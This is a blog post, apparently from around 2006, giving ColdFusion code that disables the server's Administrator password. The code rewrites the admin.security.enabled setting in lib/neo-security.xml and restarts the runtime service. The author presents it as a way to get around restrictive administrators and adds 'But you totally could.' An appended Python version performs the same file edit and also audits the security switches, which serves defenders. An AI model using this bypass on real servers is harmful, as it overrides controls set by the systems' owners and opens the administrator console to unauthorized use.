Hacking ColdFusion – Disable Administrator Security

During MAX 2006 I attended the ColdFusion CFC Birds of a Feather session. Someone was complaining that their administrators were too restrictive despite not understanding the ColdFusion service: they could not view the CFC introspection pages because those are protected by the Administrator password. So I suggested they disable that security programmatically.

After thinking about it for a while, I decided that it was an interesting challenge. I looked at it a couple of different ways, and finally settled on this solution:

<!--- Grab the security file contents. server.coldfusion.rootdir is the server install
      directory; the Administrator settings live in lib/neo-security.xml as a WDDX packet. --->
<cffile action="read" file="#server.coldfusion.rootdir#/lib/neo-security.xml" variable="rawfilecontents" />

<!--- Convert the WDDX packet to a ColdFusion structure --->
<cfwddx action="wddx2cfml" input="#rawfilecontents#" output="loginfo" />

<!--- Change the setting. JavaCast keeps the value a real boolean so that cfml2wddx
      writes it back as a WDDX boolean rather than as the string "false". --->
<cfset loginfo["admin.security.enabled"] = JavaCast("boolean", false) />

<!--- Convert back to WDDX --->
<cfwddx action="cfml2wddx" input="#loginfo#" output="fileToWrite" />

<!--- Write it back to disk, overwriting the original file. --->
<cffile action="write" addnewline="yes" fixnewline="no" file="#server.coldfusion.rootdir#/lib/neo-security.xml" output="#fileToWrite#" />

<!--- Ask the runtime service to restart so the rewritten settings are loaded.
      This seems to restart the server eventually; I had to rerun it several times to get it to work. --->
<cfset serverFactory = CreateObject("java", "coldfusion.server.ServiceFactory") />
<cfset runTimeService = serverFactory.RuntimeService />
<cfset runTimeService.restart() />

You have to run it a couple of times before it kicks in.

Now, it is important to point out the following:

  1. If sandbox security is enabled and the sandbox does not let this template read and write under the ColdFusion lib directory, this won’t work.
  2. If proper IIS restrictions on /CFIDE/administrator are set, this won’t work.
  3. You should never do this on a hosted server as it will probably violate your hosting agreement.
  4. I’m not advocating messing with your administrators.
  5. But you totally could.
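To make the file edit concrete, here is the same round-trip (read the packet, change one key, write the whole struct back) done in Python, together with the check an administrator would run on a copy of neo-security.xml to see whether any of the three security switches is off. This is an added example, not code from the original post: the packet is constructed to mimic the shape of neo-security.xml (a WDDX struct mapping setting names to typed values) and carries only three of the real file's keys, and the finding strings in `audit` are my own wording.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like ColdFusion's lib/neo-security.xml: a WDDX packet
# whose top-level struct maps setting names to typed values. The real file carries
# many more keys; only the three security switches are shown here.
SAMPLE_NEO_SECURITY = """<wddxPacket version='1.0'><header/><data>
<struct type='coldfusion.server.ConfigMap'>
<var name='admin.security.enabled'><boolean value='true'/></var>
<var name='rds.security.enabled'><boolean value='true'/></var>
<var name='sandbox.security.enabled'><boolean value='false'/></var>
</struct></data></wddxPacket>"""


def _struct(root):
    """Return the top-level WDDX struct, or raise if the packet is not shaped that way."""
    struct = root.find("./data/struct")
    if struct is None:
        raise ValueError("not a WDDX packet with a top-level struct")
    return struct


def read_flags(packet):
    """Parse the packet and return {name: bool} for every boolean var in the struct."""
    flags = {}
    for var in _struct(ET.fromstring(packet)).findall("var"):
        boolean = var.find("boolean")
        if boolean is not None:
            flags[var.get("name")] = boolean.get("value", "").lower() == "true"
    return flags


def set_flag(packet, name, value):
    """Re-serialize the packet with boolean var `name` set to `value`.

    This is the edit the cfwddx/cffile snippet performs: parse the packet,
    rewrite one key, and write the whole struct back out.
    """
    root = ET.fromstring(packet)
    for var in _struct(root).findall("var"):
        if var.get("name") == name:
            boolean = var.find("boolean")
            if boolean is None:
                raise ValueError(f"{name} is not a boolean setting")
            boolean.set("value", "true" if value else "false")
            return ET.tostring(root, encoding="unicode")
    raise KeyError(name)


def audit(packet):
    """Findings a defender would want from a copy of neo-security.xml.

    A missing key is treated as disabled, so a stripped-down file is reported too.
    """
    flags = read_flags(packet)
    findings = []
    if not flags.get("admin.security.enabled", False):
        findings.append("Administrator password is disabled")
    if not flags.get("rds.security.enabled", False):
        findings.append("RDS password is disabled")
    if not flags.get("sandbox.security.enabled", False):
        findings.append("sandbox security is off, so a cffile write to lib/ is not blocked")
    return findings


if __name__ == "__main__":
    print("before:", audit(SAMPLE_NEO_SECURITY))
    hacked = set_flag(SAMPLE_NEO_SECURITY, "admin.security.enabled", False)
    print("after: ", audit(hacked))
```

Run it against the real file by replacing `SAMPLE_NEO_SECURITY` with the contents of `lib/neo-security.xml` taken from a backup or from the live server; the sandbox finding is the one that matters for the hack above, since it is what stops an arbitrary template from reaching the file in the first place.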
